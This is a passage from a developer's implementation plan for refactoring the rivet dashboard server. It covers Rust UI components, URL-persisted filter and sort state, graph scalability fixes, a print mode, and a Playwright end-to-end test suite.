structs and the `pub async fn run()` function (line 272 of serve.rs). Keep the router definition here. Import view handlers from submodules (initially re-export from old serve.rs via `#[path]`). Also move utility routes that don't belong to a specific view: `/source-raw/{*path}`, `/api/links/{id}`, `/wasm/{*path}`, `/docs-asset/{*path}`, `/reload`. + +- [ ] **Step 2: Create serve/layout.rs with page_layout and print_layout** + +Extract `page_layout()` from serve.rs (lines 2372-2566). Add a new `print_layout()` that renders the same content but without nav, context bar, or sidebar — just the content area with print-friendly CSS. + +The print layout key: check for `?print=1` query param. If present, return content wrapped in minimal `<html>` with `@media print` CSS, no nav, no HTMX. + +```rust +pub fn page_layout(content: &str, state: &AppState, print: bool) -> Html<String> { + if print { + return print_layout(content, state); + } + // ... existing layout logic +} + +fn print_layout(content: &str, state: &AppState) -> Html<String> { + Html(format!(r##"<!DOCTYPE html> +<html lang="en"> +<head> +<meta charset="utf-8"> +<title>{project} — Rivet + + +{content} +"##, + project = html_escape(&state.context.project_name), + )) +} +``` + +- [ ] **Step 3: Create serve/js.rs and serve/styles.rs** + +Extract **all** JavaScript constants from serve.rs into `js.rs`: +- Main JS block (~430 lines, lines 1339-1767): `pub const JS: &str` +- Search JS (~108 lines, starting line 1772): `pub const SEARCH_JS: &str` +- AADL JS (starting line 1880): `pub const AADL_JS: &str` + +Extract the CSS constant (~580 lines, lines 755-1335) into `styles.rs`: +- `pub const CSS: &str` + +All three JS constants are referenced in `page_layout()` via `{JS}`, `{SEARCH_JS}`, `{AADL_JS}` — ensure the imports match. + +- [ ] **Step 4: Update main.rs** + +Change `mod serve;` to point at the new directory module. Verify `rivet serve` still starts and all routes respond. + +- [ ] **Step 5: Test manually** + +Run: `cargo run --release -- serve` +Visit: `http://localhost:3000/`, `/artifacts`, `/stpa`, `/graph` +Expected: All pages render identically to before. + +- [ ] **Step 6: Commit** + +``` +git add rivet-cli/src/serve/ rivet-cli/src/main.rs +git commit -m "refactor: extract serve.rs into serve/ module directory + +Implements: FEAT-052 +Refs: DD-005" +``` + +--- + +## Task 2: Build the component kit (components.rs) + +This is the core deliverable. Build reusable HTML component functions that every view will use. + +**Files:** +- Create: `rivet-cli/src/serve/components.rs` + +### Component 1: FilterBar + +A horizontal bar with type checkboxes, status dropdown, tag filter, and text search. All selections are reflected in query params so the URL is bookmarkable and survives reload. + +- [ ] **Step 1: Write FilterBar component** + +```rust +/// Render a filter bar that preserves state in URL query params. +/// +/// `active_filters` is the current state parsed from the request. +/// `base_url` is the route path (e.g., "/artifacts", "/stpa"). +/// Each filter change triggers an HTMX GET to `base_url?{new_params}`. +pub fn filter_bar(cfg: &FilterBarConfig) -> String { + // Renders: + // - Type checkboxes (from cfg.available_types) + // - Status dropdown (from cfg.available_statuses) + // - Tag pills (from cfg.available_tags) + // - Free-text search input + // - Clear all button + // All wired with onchange -> update URL params and hx-get +} + +pub struct FilterBarConfig { + pub base_url: String, + pub available_types: Vec, + pub available_statuses: Vec, + pub available_tags: Vec, + pub active_types: Vec, + pub active_statuses: Vec, + pub active_tags: Vec, + pub search_text: String, + pub extra_params: Vec<(String, String)>, // preserve non-filter params +} +``` + +- [ ] **Step 2: Write SortableTable component** + +```rust +/// Render a sortable HTML table with column headers that toggle sort direction. +/// Sort state is encoded in `?sort=col&dir=asc` query params. +pub fn sortable_table(cfg: &TableConfig) -> String { ... } + +pub struct TableConfig { + pub base_url: String, + pub columns: Vec, + pub rows: Vec>, // each inner vec = one row's cells (HTML) + pub sort_column: Option, + pub sort_dir: SortDir, + pub extra_params: Vec<(String, String)>, +} +``` + +- [ ] **Step 3: Write CollapsibleTree component** + +```rust +/// Render a hierarchical tree with
/ elements. +/// Fold/unfold state is encoded in `?open=id1,id2,id3` query param. +/// Provides "Expand All" / "Collapse All" buttons that update the URL. +pub fn collapsible_tree(nodes: &[TreeNode], open_ids: &[String], base_url: &str) -> String { ... } + +pub struct TreeNode { + pub id: String, + pub summary_html: String, + pub detail_html: String, + pub children: Vec, +} +``` + +- [ ] **Step 4: Write Pagination component** + +```rust +/// Render pagination controls: « ‹ page N of M › » +/// Page state encoded in `?page=N&per_page=M` query params. +pub fn pagination(page: usize, per_page: usize, total: usize, base_url: &str, extra_params: &[(String, String)]) -> String { ... } +``` + +- [ ] **Step 5: Write unit tests** + +```rust +#[cfg(test)] +mod tests { + #[test] + fn filter_bar_renders_checkboxes() { ... } + #[test] + fn filter_bar_preserves_extra_params() { ... } + #[test] + fn sortable_table_toggle_direction() { ... } + #[test] + fn collapsible_tree_open_ids() { ... } + #[test] + fn pagination_boundaries() { ... } +} +``` + +Run: `cargo test -p rivet-cli` +Expected: All new tests pass. + +- [ ] **Step 6: Commit** + +``` +git add rivet-cli/src/serve/components.rs +git commit -m "feat(serve): add reusable UI component kit — filter bar, sortable table, collapsible tree, pagination + +Implements: FEAT-052 +Refs: SC-15" +``` + +--- + +## Task 3: URL-persisted view state middleware + +Add a shared query param struct and middleware that every view can use. + +**Files:** +- Modify: `rivet-cli/src/serve/mod.rs` + +- [ ] **Step 1: Define ViewParams extractor** + +```rust +/// Common query params shared across all views. +/// Views add their own params on top of this. +#[derive(Debug, Deserialize, Default)] +pub struct ViewParams { + #[serde(default)] + pub types: Option, + #[serde(default)] + pub status: Option, + #[serde(default)] + pub tags: Option, + #[serde(default)] + pub q: Option, + #[serde(default)] + pub sort: Option, + #[serde(default)] + pub dir: Option, + #[serde(default)] + pub page: Option, + #[serde(default)] + pub per_page: Option, + #[serde(default)] + pub open: Option, // comma-separated open node IDs + #[serde(default)] + pub print: Option, // print mode +} +``` + +- [ ] **Step 2: Add helper to rebuild URL with current params** + +```rust +impl ViewParams { + /// Build query string from current params, allowing overrides. + pub fn to_query_string(&self, overrides: &[(&str, &str)]) -> String { ... } +} +``` + +- [ ] **Step 3: Commit** + +``` +git add rivet-cli/src/serve/mod.rs +git commit -m "feat(serve): add ViewParams extractor for URL-persisted filter/sort/page state + +Refs: DD-005" +``` + +--- + +## Task 4: Fix graph scalability + +Fix the three critical graph issues: blocking tokio, O(N²) on large graphs, and SVG buffer sizing. + +**Files:** +- Modify: `rivet-cli/src/serve/views/graph.rs` (or serve.rs until split) +- Modify: `etch/src/layout.rs` +- Modify: `etch/src/svg.rs` + +- [ ] **Step 1: Write failing test for large graph layout** + +Note: `NodeInfo` does not derive `Default`. Construct it explicitly. + +```rust +// etch/src/layout.rs +#[test] +fn layout_500_nodes_completes() { + use petgraph::Graph; + let mut g = Graph::new(); + let nodes: Vec<_> = (0..500).map(|i| g.add_node(format!("N-{i}"))).collect(); + // Chain edges: 0→1→2→...→499 + for w in nodes.windows(2) { + g.add_edge(w[0], w[1], "link".to_string()); + } + let layout = layout( + &g, + &|_, n| NodeInfo { + id: n.clone(), + label: n.clone(), + node_type: String::new(), + sublabel: None, + parent: None, + }, + &|_, e| EdgeInfo { label: e.clone() }, + &LayoutOptions::default(), + ); + assert_eq!(layout.nodes.len(), 500); +} +``` + +Run: `cargo test -p etch layout_500` +Expected: PASS (but may be slow — establishes baseline) + +- [ ] **Step 2: Add node budget to etch layout** + +Add a `max_nodes: Option` field to `LayoutOptions`. When set, if `graph.node_count() > max_nodes`, return a `GraphLayout` with a single sentinel node saying "Graph too large ({n} nodes). Use filters or focus to narrow the view." This prevents the O(N²) blowup. + +```rust +// In layout(): +if let Some(max) = options.max_nodes { + if graph.node_count() > max { + return GraphLayout { + nodes: vec![LayoutNode { + id: "__budget_exceeded__".into(), + label: format!("Graph has {} nodes (budget: {}). Use type filters or focus on a specific artifact.", graph.node_count(), max), + ..Default::default() + }], + edges: vec![], + width: 400.0, + height: 60.0, + }; + } +} +``` + +- [ ] **Step 3: Fix SVG buffer sizing** + +In `etch/src/svg.rs`, replace the fixed 4096-byte capacity with a dynamic estimate: + +```rust +// Estimate ~500 bytes per node + ~200 bytes per edge + base overhead +let estimated = 2048 + layout.nodes.len() * 500 + layout.edges.len() * 200; +let mut svg = String::with_capacity(estimated); +``` + +- [ ] **Step 4: Move graph layout to spawn_blocking** + +In the graph view handler, wrap the layout + SVG render in `tokio::task::spawn_blocking` so it doesn't block the async runtime. + +**IMPORTANT:** `spawn_blocking` requires `Send + 'static` — you cannot capture borrowed references from the `RwLock` read guard. Pre-collect all node/edge info into owned collections BEFORE entering the blocking task: + +```rust +// Pre-collect owned data while we hold the read lock +let node_infos: HashMap = sub.node_indices() + .map(|idx| { + let id = sub[idx].clone(); + let atype = store.get(&id).map(|a| a.artifact_type.clone()).unwrap_or_default(); + let title = store.get(&id).map(|a| a.title.clone()).unwrap_or_default(); + let sublabel = if title.len() > 28 { Some(format!("{}...", &title[..26])) } + else if title.is_empty() { None } + else { Some(title) }; + (idx, NodeInfo { id, label: sub[idx].clone(), node_type: atype, sublabel, parent: None }) + }) + .collect(); + +let edge_infos: HashMap = sub.edge_indices() + .map(|idx| (idx, EdgeInfo { label: sub[idx].clone() })) + .collect(); + +// Drop the read lock, then spawn blocking with owned data +let svg = tokio::task::spawn_blocking(move || { + let gl = etch::layout(&sub, &|idx, _| node_infos[&idx].clone(), + &|idx, _| edge_infos[&idx].clone(), &layout_opts); + etch::svg::render_svg(&gl, &svg_opts) +}).await.unwrap(); +``` + +- [ ] **Step 5: Set default node budget in graph route** + +In the graph view handler, set `max_nodes: Some(300)` by default. Add a `?budget=N` query param to override (capped at 1000). + +- [ ] **Step 6: Run tests** + +Run: `cargo test --all` +Expected: All tests pass, including the new 500-node test. + +- [ ] **Step 7: Commit** + +``` +git add etch/src/layout.rs etch/src/svg.rs rivet-cli/src/serve/ +git commit -m "fix(serve/etch): graph scalability — spawn_blocking, node budget, dynamic SVG buffer + +Fixes: H-13 +Implements: SC-15" +``` + +--- + +## Task 5: Extract and enhance STPA view + +Move STPA view to its own file with the new component kit: filter bar, fold/unfold with URL state, link chain drill-down. + +**Files:** +- Create: `rivet-cli/src/serve/views/stpa.rs` + +- [ ] **Step 1: Extract stpa_view from serve.rs** + +Move `stpa_view()` / `stpa_partial()` (lines 4654-5016) into `views/stpa.rs`. Wire up in `mod.rs` router. Verify it still renders. + +- [ ] **Step 2: Add FilterBar to STPA view** + +Add a filter bar at the top with: +- Type checkboxes: loss, hazard, sub-hazard, system-constraint, controller, uca, controller-constraint, loss-scenario +- Severity filter (for hazards) +- UCA-type filter (not-providing, providing, too-early-too-late, stopped-too-soon) +- Text search across titles and descriptions + +All filter state in URL: `/stpa?types=hazard,uca&uca_type=not-providing&q=firmware` + +- [ ] **Step 3: Add URL-persisted fold/unfold state** + +Replace the current hardcoded `
` with the `collapsible_tree` component. Each node's open/closed state is tracked in `?open=H-1,H-2,SC-3`. + +Add "Expand All" / "Collapse All" buttons that update the URL and re-render via HTMX. + +- [ ] **Step 4: Add link chain drill-down** + +When clicking a linked artifact in the STPA tree (e.g., a hazard's linked losses, or a UCA's linked controller), show an inline expandable panel with the target artifact's details. Use HTMX `hx-get="/artifacts/{id}/preview"` lazy loading. + +- [ ] **Step 5: Test manually** + +Run: `cargo run --release -- serve` +Visit: `http://localhost:3000/stpa?types=uca&uca_type=not-providing&open=H-1` +Expected: Filtered to UCAs of type "not-providing", H-1 tree expanded, URL preserved on reload. + +- [ ] **Step 6: Commit** + +``` +git add rivet-cli/src/serve/views/stpa.rs rivet-cli/src/serve/mod.rs +git commit -m "feat(serve): rich STPA view with filter bar, URL-persisted fold/unfold, link drill-down + +Implements: FEAT-052 +Refs: REQ-002" +``` + +--- + +## Task 6: Extract and enhance artifacts view + +**Files:** +- Create: `rivet-cli/src/serve/views/artifacts.rs` + +- [ ] **Step 1: Extract artifacts_list and artifact_detail** + +- [ ] **Step 2: Replace inline filterTable() with FilterBar component** + +Add server-side filtering with URL params: `/artifacts?types=requirement&status=approved&sort=id&dir=asc&page=2` + +- [ ] **Step 3: Add SortableTable for artifact list** + +Clickable column headers for ID, Type, Title, Status. Sort state in URL. + +- [ ] **Step 4: Add pagination** + +Default 50 per page. Page state in URL: `?page=2&per_page=50`. + +- [ ] **Step 5: Commit** + +``` +git commit -m "feat(serve): enhanced artifacts view with server-side filter/sort/pagination + +Refs: DD-005" +``` + +--- + +## Task 7: Extract and enhance remaining views + +Apply the component kit to traceability, validation, matrix, documents, and other views. Each gets its own file with filter/sort/URL state. + +**Files:** +- Create remaining `views/*.rs` files + +- [ ] **Step 1: Extract traceability view** — add filter bar, fold/unfold tree with URL state +- [ ] **Step 2: Extract validation view** — add severity filter, sort by type/ID +- [ ] **Step 3: Extract matrix view** — preserve from/to/link params in URL +- [ ] **Step 4: Extract documents view** — add `?print=1` support for clean printable output +- [ ] **Step 5: Extract remaining views** (source, search, results, diff, doc-linkage, help) +- [ ] **Step 6: Delete old serve.rs** once all handlers are extracted + +- [ ] **Step 7: Commit per extraction** (one commit per view or per logical group) + +--- + +## Task 8: Print mode + +Add `?print=1` query param support to all views for clean printable output. + +**Files:** +- Modify: `rivet-cli/src/serve/layout.rs` +- Modify: `rivet-cli/src/serve/mod.rs` (middleware) + +- [ ] **Step 1: Add print detection to page_layout** + +Check for `?print=1` in every response. If present, use `print_layout()` instead of `page_layout()`. The print layout strips: nav bar, context bar, sidebar, HTMX scripts, interactive controls. + +- [ ] **Step 2: Add print CSS** + +```css +@media print { + .nav, .context-bar, .filter-bar, .pagination { display: none; } + body { margin: 0; font-size: 11pt; } + a { color: inherit; text-decoration: none; } + table { page-break-inside: auto; } + tr { page-break-inside: avoid; } +} +``` + +- [ ] **Step 3: Add "Print" button to page layout** + +Small button in the context bar that opens current URL + `?print=1` in a new tab. + +- [ ] **Step 4: Test** + +Visit: `http://localhost:3000/stpa?print=1` +Expected: Clean page without nav/sidebar, suitable for Cmd+P printing. + +- [ ] **Step 5: Commit** + +``` +git commit -m "feat(serve): add ?print=1 mode for clean printable views + +Refs: DD-005" +``` + +--- + +## Task 9: Playwright E2E test suite + +Comprehensive browser-based testing for every dashboard view, component interaction, URL state persistence, print mode, and graph scalability. + +**Files:** +- Create: `tests/playwright/playwright.config.ts` +- Create: `tests/playwright/package.json` +- Create: `tests/playwright/helpers.ts` +- Create: `tests/playwright/navigation.spec.ts` +- Create: `tests/playwright/artifacts.spec.ts` +- Create: `tests/playwright/stpa.spec.ts` +- Create: `tests/playwright/graph.spec.ts` +- Create: `tests/playwright/filter-sort.spec.ts` +- Create: `tests/playwright/print-mode.spec.ts` +- Create: `tests/playwright/url-state.spec.ts` +- Create: `tests/playwright/traceability.spec.ts` +- Create: `tests/playwright/documents.spec.ts` +- Create: `tests/playwright/search.spec.ts` +- Create: `tests/playwright/matrix.spec.ts` +- Create: `tests/playwright/validation.spec.ts` +- Create: `tests/playwright/accessibility.spec.ts` +- Modify: `.github/workflows/ci.yml` — add Playwright CI job + +### Setup + +- [ ] **Step 1: Create Playwright project** + +```json +// tests/playwright/package.json +{ + "name": "rivet-playwright", + "private": true, + "devDependencies": { + "@playwright/test": "^1.50.0" + }, + "scripts": { + "test": "playwright test", + "test:headed": "playwright test --headed", + "test:ui": "playwright test --ui" + } +} +``` + +```typescript +// tests/playwright/playwright.config.ts +import { defineConfig } from '@playwright/test'; + +export default defineConfig({ + testDir: '.', + timeout: 30_000, + retries: 1, + use: { + baseURL: 'http://localhost:3000', + trace: 'on-first-retry', + screenshot: 'only-on-failure', + }, + webServer: { + command: 'cargo run --release -- serve --port 3000', + port: 3000, + timeout: 120_000, + reuseExistingServer: !process.env.CI, + cwd: '../..', + }, + projects: [ + { name: 'chromium', use: { browserName: 'chromium' } }, + ], +}); +``` + +- [ ] **Step 2: Create test helpers** + +```typescript +// tests/playwright/helpers.ts +import { Page, expect } from '@playwright/test'; + +/** Wait for HTMX to finish all pending requests */ +export async function waitForHtmx(page: Page) { + await page.waitForFunction(() => { + // @ts-ignore + return !document.querySelector('.htmx-request'); + }, { timeout: 10_000 }); +} + +/** Navigate via HTMX (click nav link) and wait for content swap */ +export async function htmxNavigate(page: Page, linkText: string) { + await page.click(`a:has-text("${linkText}")`); + await waitForHtmx(page); +} + +/** Assert current URL contains expected path and params */ +export async function assertUrl(page: Page, path: string, params?: Record) { + const url = new URL(page.url()); + expect(url.pathname).toBe(path); + if (params) { + for (const [key, value] of Object.entries(params)) { + expect(url.searchParams.get(key)).toBe(value); + } + } +} + +/** Count visible rows in an artifact table */ +export async function countTableRows(page: Page) { + return page.locator('table tbody tr').count(); +} +``` + +- [ ] **Step 3: Install and verify** + +```bash +cd tests/playwright && npm install && npx playwright install chromium +``` + +Run: `cd tests/playwright && npx playwright test --list` +Expected: Lists all test files (initially empty specs) + +### Core navigation tests + +- [ ] **Step 4: Write navigation.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx, assertUrl } from './helpers'; + +test.describe('Navigation', () => { + test('dashboard loads with project name in header', async ({ page }) => { + await page.goto('/'); + await expect(page.locator('.ctx-project')).toHaveText('rivet'); + }); + + test('all nav links are reachable', async ({ page }) => { + await page.goto('/'); + const navLinks = [ + { text: 'Dashboard', path: '/' }, + { text: 'Artifacts', path: '/artifacts' }, + { text: 'Validate', path: '/validate' }, + { text: 'Matrix', path: '/matrix' }, + { text: 'Graph', path: '/graph' }, + { text: 'Coverage', path: '/coverage' }, + ]; + for (const link of navLinks) { + await page.click(`a:has-text("${link.text}")`); + await waitForHtmx(page); + // HTMX updates URL via hx-push-url + await expect(page).toHaveURL(new RegExp(link.path)); + } + }); + + test('direct URL access works (no redirect loop)', async ({ page }) => { + await page.goto('/artifacts'); + await expect(page.locator('table')).toBeVisible(); + await page.goto('/stpa'); + await expect(page.locator('h2')).toContainText(/STPA/i); + }); + + test('browser back/forward preserves state', async ({ page }) => { + await page.goto('/'); + await page.click('a:has-text("Artifacts")'); + await waitForHtmx(page); + await page.click('a:has-text("Graph")'); + await waitForHtmx(page); + await page.goBack(); + await expect(page).toHaveURL(/artifacts/); + await page.goForward(); + await expect(page).toHaveURL(/graph/); + }); + + test('reload button refreshes data', async ({ page }) => { + await page.goto('/'); + const reloadBtn = page.locator('button:has-text("Reload")'); + await expect(reloadBtn).toBeVisible(); + await reloadBtn.click(); + await waitForHtmx(page); + // Page should still be functional after reload + await expect(page.locator('.ctx-project')).toHaveText('rivet'); + }); +}); +``` + +### Artifact tests + +- [ ] **Step 5: Write artifacts.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx, assertUrl, countTableRows } from './helpers'; + +test.describe('Artifacts', () => { + test('artifact list shows all artifacts', async ({ page }) => { + await page.goto('/artifacts'); + const rows = await countTableRows(page); + expect(rows).toBeGreaterThan(300); // 328 artifacts expected + }); + + test('artifact detail shows links and backlinks', async ({ page }) => { + await page.goto('/artifacts/REQ-001'); + await expect(page.locator('h2')).toContainText('REQ-001'); + // Should show outgoing and incoming links sections + await expect(page.locator('text=satisfied-by')).toBeVisible(); + }); + + test('artifact hover preview loads', async ({ page }) => { + await page.goto('/artifacts'); + // Hover over first artifact link + const firstLink = page.locator('a[href*="/artifacts/"]').first(); + await firstLink.hover(); + // Preview tooltip should appear (loaded via /artifacts/{id}/preview) + await expect(page.locator('.hover-card, .tooltip, [data-preview]')).toBeVisible({ timeout: 5000 }); + }); + + test('filter by type via URL params', async ({ page }) => { + await page.goto('/artifacts?types=requirement'); + await waitForHtmx(page); + const rows = await countTableRows(page); + expect(rows).toBe(31); // 31 requirements + // All visible rows should be requirements + const types = await page.locator('table tbody tr td:nth-child(2)').allTextContents(); + for (const t of types) { + expect(t.trim().toLowerCase()).toContain('requirement'); + } + }); + + test('sort by column via URL params', async ({ page }) => { + await page.goto('/artifacts?sort=id&dir=desc'); + await waitForHtmx(page); + const firstId = await page.locator('table tbody tr:first-child td:first-child').textContent(); + const lastId = await page.locator('table tbody tr:last-child td:first-child').textContent(); + // Descending sort: first ID should be "later" alphabetically + expect(firstId!.localeCompare(lastId!)).toBeGreaterThan(0); + }); + + test('pagination works', async ({ page }) => { + await page.goto('/artifacts?page=1&per_page=20'); + const rows = await countTableRows(page); + expect(rows).toBeLessThanOrEqual(20); + // Pagination controls should be visible + await expect(page.locator('.pagination, [data-pagination]')).toBeVisible(); + }); +}); +``` + +### STPA tests + +- [ ] **Step 6: Write stpa.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('STPA View', () => { + test('STPA page shows all artifact type counts', async ({ page }) => { + await page.goto('/stpa'); + // Summary cards should show counts + await expect(page.locator('text=loss')).toBeVisible(); + await expect(page.locator('text=hazard')).toBeVisible(); + await expect(page.locator('text=uca')).toBeVisible(); + }); + + test('hierarchical tree is expandable', async ({ page }) => { + await page.goto('/stpa'); + // Find a
element and toggle it + const details = page.locator('details').first(); + const wasOpen = await details.getAttribute('open'); + await details.locator('summary').click(); + const isOpen = await details.getAttribute('open'); + expect(isOpen !== wasOpen).toBeTruthy(); + }); + + test('expand all / collapse all buttons work', async ({ page }) => { + await page.goto('/stpa'); + // Click "Expand All" + const expandBtn = page.locator('button:has-text("Expand"), button:has-text("expand")'); + if (await expandBtn.isVisible()) { + await expandBtn.click(); + await waitForHtmx(page); + // All details should be open + const closedDetails = await page.locator('details:not([open])').count(); + expect(closedDetails).toBe(0); + } + }); + + test('UCA table shows all UCA types', async ({ page }) => { + await page.goto('/stpa'); + await expect(page.locator('text=not-providing')).toBeVisible(); + await expect(page.locator('text=providing')).toBeVisible(); + }); + + test('filter by type via URL preserves on reload', async ({ page }) => { + await page.goto('/stpa?types=uca'); + await waitForHtmx(page); + // Reload the page + await page.reload(); + // Filter should still be active + await expect(page).toHaveURL(/types=uca/); + }); + + test('fold/unfold state persists in URL', async ({ page }) => { + await page.goto('/stpa?open=H-1,H-2'); + await waitForHtmx(page); + // H-1 and H-2 sections should be open + const h1Details = page.locator('details:has(summary:has-text("H-1"))'); + if (await h1Details.isVisible()) { + await expect(h1Details).toHaveAttribute('open', ''); + } + }); +}); +``` + +### Graph tests + +- [ ] **Step 7: Write graph.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('Graph View', () => { + test('graph renders SVG with nodes', async ({ page }) => { + await page.goto('/graph?types=requirement&depth=2'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await expect(svg).toBeVisible({ timeout: 15_000 }); + // Should have at least some nodes + const nodes = await svg.locator('[data-id]').count(); + expect(nodes).toBeGreaterThan(0); + }); + + test('focus on specific artifact', async ({ page }) => { + await page.goto('/graph?focus=REQ-001&depth=2'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await expect(svg).toBeVisible({ timeout: 15_000 }); + // REQ-001 node should be highlighted + await expect(svg.locator('[data-id="REQ-001"]')).toBeVisible(); + }); + + test('graph zoom controls work', async ({ page }) => { + await page.goto('/graph?types=requirement'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await expect(svg).toBeVisible({ timeout: 15_000 }); + const viewBoxBefore = await svg.getAttribute('viewBox'); + // Click zoom in button + const zoomIn = page.locator('button:has-text("+")'); + if (await zoomIn.isVisible()) { + await zoomIn.click(); + // viewBox should change after zoom + } + }); + + test('node budget prevents crash on large graph', async ({ page }) => { + // Full unfiltered graph should either render with budget or show message + await page.goto('/graph'); + await waitForHtmx(page); + // Should not timeout — either SVG renders or budget message shows + const svgOrMessage = page.locator('svg, .budget-exceeded, text:has-text("budget")'); + await expect(svgOrMessage.first()).toBeVisible({ timeout: 30_000 }); + }); + + test('graph type filter checkboxes work', async ({ page }) => { + await page.goto('/graph'); + // Check a type filter checkbox + const checkbox = page.locator('input[type="checkbox"][value="requirement"]'); + if (await checkbox.isVisible()) { + await checkbox.check(); + await waitForHtmx(page); + await expect(page).toHaveURL(/types=.*requirement/); + } + }); + + test('clicking graph node navigates to artifact', async ({ page }) => { + await page.goto('/graph?focus=REQ-001&depth=1'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await expect(svg).toBeVisible({ timeout: 15_000 }); + // Click on a node link in the SVG + const nodeLink = svg.locator('a[href*="/artifacts/"]').first(); + if (await nodeLink.isVisible()) { + await nodeLink.click(); + await expect(page).toHaveURL(/\/artifacts\//); + } + }); +}); +``` + +### Filter/sort component tests + +- [ ] **Step 8: Write filter-sort.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('Filter and Sort Components', () => { + test('filter bar type checkboxes update URL', async ({ page }) => { + await page.goto('/artifacts'); + const filterCheckbox = page.locator('.filter-bar input[type="checkbox"]').first(); + if (await filterCheckbox.isVisible()) { + const value = await filterCheckbox.getAttribute('value'); + await filterCheckbox.check(); + await waitForHtmx(page); + await expect(page).toHaveURL(new RegExp(`types=.*${value}`)); + } + }); + + test('sort column headers toggle direction', async ({ page }) => { + await page.goto('/artifacts'); + const sortHeader = page.locator('th[data-sort], th a[href*="sort="]').first(); + if (await sortHeader.isVisible()) { + await sortHeader.click(); + await waitForHtmx(page); + await expect(page).toHaveURL(/sort=/); + // Click again to reverse + await sortHeader.click(); + await waitForHtmx(page); + await expect(page).toHaveURL(/dir=(asc|desc)/); + } + }); + + test('text search filters in real-time', async ({ page }) => { + await page.goto('/artifacts'); + const searchInput = page.locator('input[name="q"], input[type="search"]'); + if (await searchInput.isVisible()) { + await searchInput.fill('OSLC'); + // Wait for debounced HTMX request + await page.waitForTimeout(500); + await waitForHtmx(page); + await expect(page).toHaveURL(/q=OSLC/); + } + }); + + test('clear filters resets URL', async ({ page }) => { + await page.goto('/artifacts?types=requirement&status=approved&q=test'); + const clearBtn = page.locator('button:has-text("Clear"), a:has-text("Clear")'); + if (await clearBtn.isVisible()) { + await clearBtn.click(); + await waitForHtmx(page); + await expect(page).toHaveURL('/artifacts'); + } + }); + + test('pagination preserves filters', async ({ page }) => { + await page.goto('/artifacts?types=feature&page=1&per_page=10'); + // Click next page + const nextPage = page.locator('a:has-text("›"), a:has-text("Next")'); + if (await nextPage.isVisible()) { + await nextPage.click(); + await waitForHtmx(page); + // URL should have page=2 AND types=feature + await expect(page).toHaveURL(/page=2/); + await expect(page).toHaveURL(/types=feature/); + } + }); +}); +``` + +### Print mode tests + +- [ ] **Step 9: Write print-mode.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; + +test.describe('Print Mode', () => { + test('?print=1 hides nav and context bar', async ({ page }) => { + await page.goto('/stpa?print=1'); + // Nav should not be visible + await expect(page.locator('nav, .nav')).not.toBeVisible(); + // Context bar should not be visible + await expect(page.locator('.context-bar')).not.toBeVisible(); + // Content should still be visible + await expect(page.locator('h2')).toBeVisible(); + }); + + test('?print=1 works on all major views', async ({ page }) => { + const views = ['/artifacts', '/stpa', '/validate', '/matrix', '/coverage', '/documents']; + for (const view of views) { + await page.goto(`${view}?print=1`); + // Should render without nav + await expect(page.locator('nav, .nav')).not.toBeVisible(); + // Should have content + const bodyText = await page.locator('body').textContent(); + expect(bodyText!.length).toBeGreaterThan(50); + } + }); + + test('print button opens print view in new tab', async ({ page }) => { + await page.goto('/stpa'); + const printBtn = page.locator('button:has-text("Print"), a:has-text("Print")'); + if (await printBtn.isVisible()) { + // Check that the print link has print=1 + const href = await printBtn.getAttribute('href') || await printBtn.getAttribute('onclick') || ''; + expect(href).toContain('print=1'); + } + }); + + test('print view is suitable for PDF generation', async ({ page }) => { + await page.goto('/stpa?print=1'); + // Generate PDF to verify it doesn't crash + const pdf = await page.pdf({ format: 'A4' }); + expect(pdf.length).toBeGreaterThan(1000); + }); +}); +``` + +### URL state persistence tests + +- [ ] **Step 10: Write url-state.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('URL State Persistence', () => { + test('filter state survives page reload', async ({ page }) => { + await page.goto('/artifacts?types=requirement&status=approved'); + await waitForHtmx(page); + const rowsBefore = await page.locator('table tbody tr').count(); + await page.reload(); + await waitForHtmx(page); + const rowsAfter = await page.locator('table tbody tr').count(); + expect(rowsAfter).toBe(rowsBefore); + await expect(page).toHaveURL(/types=requirement/); + await expect(page).toHaveURL(/status=approved/); + }); + + test('sort state survives page reload', async ({ page }) => { + await page.goto('/artifacts?sort=id&dir=desc'); + await page.reload(); + await expect(page).toHaveURL(/sort=id/); + await expect(page).toHaveURL(/dir=desc/); + }); + + test('page state survives page reload', async ({ page }) => { + await page.goto('/artifacts?page=2&per_page=20'); + await page.reload(); + await expect(page).toHaveURL(/page=2/); + }); + + test('HTMX navigation updates URL via pushState', async ({ page }) => { + await page.goto('/'); + await page.click('a:has-text("Artifacts")'); + await waitForHtmx(page); + // URL should reflect navigation + await expect(page).toHaveURL(/\/artifacts/); + // Should be a real URL change, not just hash + const url = new URL(page.url()); + expect(url.pathname).toBe('/artifacts'); + }); + + test('combined filter+sort+page state in URL', async ({ page }) => { + await page.goto('/artifacts?types=feature&sort=id&dir=asc&page=1&per_page=10'); + await waitForHtmx(page); + // Verify all params are reflected in rendered state + await expect(page).toHaveURL(/types=feature/); + await expect(page).toHaveURL(/sort=id/); + await expect(page).toHaveURL(/page=1/); + }); +}); +``` + +### Additional view tests + +- [ ] **Step 11: Write traceability.spec.ts, documents.spec.ts, search.spec.ts, matrix.spec.ts, validation.spec.ts** + +Each spec covers: +- Page loads and renders content +- Filter/sort controls work +- URL state persists +- Links to other views work +- Print mode works + +Key tests per view: + +**traceability.spec.ts:** +- Traceability chain renders with expandable nodes +- Filter by artifact type narrows the chain + +**documents.spec.ts:** +- Document list shows all docs +- Document detail renders markdown as HTML +- AADL diagram blocks render SVG (if spar WASM loaded) +- Source refs are clickable links + +**search.spec.ts:** +- Search returns results for known artifact IDs +- Search highlights matches +- Empty search shows helpful message + +**matrix.spec.ts:** +- Matrix renders with from/to type headers +- Cell links navigate to artifact detail +- from/to/link params preserved in URL + +**validation.spec.ts:** +- Validation page shows diagnostics +- Error/warning badges match counts +- Severity filter 